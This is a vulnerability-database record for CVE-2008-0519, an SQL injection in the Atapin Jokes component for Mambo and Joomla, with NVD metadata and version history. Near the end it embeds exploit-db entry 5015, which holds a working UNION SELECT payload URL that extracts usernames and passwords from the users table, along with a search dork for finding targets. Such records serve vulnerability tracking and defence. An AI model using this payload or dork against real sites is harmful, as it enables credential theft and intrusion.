ID CVE-2008-0519Type cveReporter NVDModified 2017-09-28T21:30:19
Description
SQL injection vulnerability in index.php in the Atapin Jokes (com_jokes) 1.0 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the cat parameter in a CatView action.
{"id": "CVE-2008-0519", "bulletinFamily": "NVD", "title": "CVE-2008-0519", "description": "SQL injection vulnerability in index.php in the Atapin Jokes (com_jokes) 1.0 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the cat parameter in a CatView action.", "published": "2008-01-31T15:00:00", "modified": "2017-09-28T21:30:19", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0519", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/27522", "https://www.exploit-db.com/exploits/5015", "http://www.vupen.com/english/advisories/2008/0361", "https://exchange.xforce.ibmcloud.com/vulnerabilities/40067"], "cvelist": ["CVE-2008-0519"], "type": "cve", "lastseen": "2017-09-29T14:25:44", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:joomla:com_jokes:1.0", "cpe:/a:mambo:com_jokes:1.0"], "cvelist": ["CVE-2008-0519"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in index.php in the Atapin Jokes (com_jokes) 1.0 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the cat parameter in a CatView action.", "edition": 2, "enchantments": {}, "hash": "1e271de505cc66e7ad609e9eb0f039a1d13b19032ca69a065f54bb9170333b41", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "260d1ada873d71372a5e39fbf139a8ad", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "10a3b8590a351f40071cbbe75ba737a7", "key": "title"}, {"hash": "7b34016e9034a6a68d2e54176bc3dc9a", "key": "references"}, {"hash": "f30c2ba1f2a59b965e85d21d2c3cc9f3", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "368064fcc4d797644361981d0466573e", "key": "cpe"}, {"hash": "e9a44013c7807eba4c6dc023386c4d8c", "key": "href"}, {"hash": "ad5fd2b89a5d4d6f80a06b6521182808", "key": "description"}, {"hash": "f80326c925c640f6dd22d723ef6b1206", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0519", "id": "CVE-2008-0519", "lastseen": "2017-08-08T11:24:29", "modified": "2017-08-07T21:29:37", "objectVersion": "1.3", "published": "2008-01-31T15:00:00", "references": ["http://www.securityfocus.com/bid/27522", "http://www.vupen.com/english/advisories/2008/0361", "http://www.milw0rm.com/exploits/5015", "https://exchange.xforce.ibmcloud.com/vulnerabilities/40067"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-0519", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-08-08T11:24:29"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:joomla:com_jokes:1.0", "cpe:/a:mambo:com_jokes:1.0"], "cvelist": ["CVE-2008-0519"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "SQL injection vulnerability in index.php in the Atapin Jokes (com_jokes) 1.0 component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the cat parameter in a CatView action.", "edition": 1, "enchantments": {}, "hash": "99cec31f7b600ed5250bcd86fdd20b065dbc18a770e366c2f79e5f70999fd407", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "260d1ada873d71372a5e39fbf139a8ad", "key": "published"}, {"hash": "ada779d6e42c06e16b70416985973783", "key": "references"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "10a3b8590a351f40071cbbe75ba737a7", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "368064fcc4d797644361981d0466573e", "key": "cpe"}, {"hash": "e9a44013c7807eba4c6dc023386c4d8c", "key": "href"}, {"hash": "ad5fd2b89a5d4d6f80a06b6521182808", "key": "description"}, {"hash": "f80326c925c640f6dd22d723ef6b1206", "key": "cvelist"}, {"hash": "88b4c71ac821086377594c09faa25168", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0519", "id": "CVE-2008-0519", "lastseen": "2016-09-03T10:05:22", "modified": "2011-03-07T22:04:50", "objectVersion": "1.2", "published": "2008-01-31T15:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/40067", "http://www.securityfocus.com/bid/27522", "http://www.vupen.com/english/advisories/2008/0361", "http://www.milw0rm.com/exploits/5015"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-0519", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T10:05:22"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "368064fcc4d797644361981d0466573e"}, {"key": "cvelist", "hash": "f80326c925c640f6dd22d723ef6b1206"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "ad5fd2b89a5d4d6f80a06b6521182808"}, {"key": "href", "hash": "e9a44013c7807eba4c6dc023386c4d8c"}, {"key": "modified", "hash": "5471182359dfb9195a7dc81612643081"}, {"key": "published", "hash": "260d1ada873d71372a5e39fbf139a8ad"}, {"key": "references", "hash": "31bd272f03cc40468a85ff3be3cabb7e"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "10a3b8590a351f40071cbbe75ba737a7"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d9e1606fe23eb3196bd645bb34a1365177b61231df73539f7060aa06a3428be4", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:25:44"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:5015"]}], "modified": "2017-09-29T14:25:44"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:joomla:com_jokes:1.0", "cpe:/a:mambo:com_jokes:1.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-01-31T21:17:55", "bulletinFamily": "exploit", "description": "Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability. CVE-2008-0519. Webapps exploit for php platform", "modified": "2008-01-30T00:00:00", "published": "2008-01-30T00:00:00", "id": "EDB-ID:5015", "href": "https://www.exploit-db.com/exploits/5015/", "type": "exploitdb", "title": "Mambo Component jokes 1.0 cat SQL Injection Vulnerability", "sourceData": "#########################################################################\n#\n# joomla SQL Injection(com_jokes)\n#\n#########################################################################\n#\n# AUTHOR : S@BUN\n#\n# HOME : http://www.hackturkiye.com/\n\n#########################################################################\n#\n# DorKs 1 : allinurl: \"com_jokes\"\n#\n########################################################################\nEXPLOIT :\n\nindex.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*\n\n#########################################################################\n# S@BUN www.hackturkiye.com S@BUN\n#########################################################################\n# S@BUN GOOD LUCKY S@BUN\n#########################################################################\n\n\n <mosinstall type=\"component\">\n <name>jokes</name>\n <creationDate>29/12/2005</creationDate>\n <author>Atapin</author>\n <copyright>Released under the GNU/GPL License</copyright>\n <authorEmail>info@atapin.net</authorEmail>\n\n <authorUrl>www.atapin.net</authorUrl>\n <version>1.0</version>\n <description></description>\n\n# milw0rm.com [2008-01-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5015/"}]}
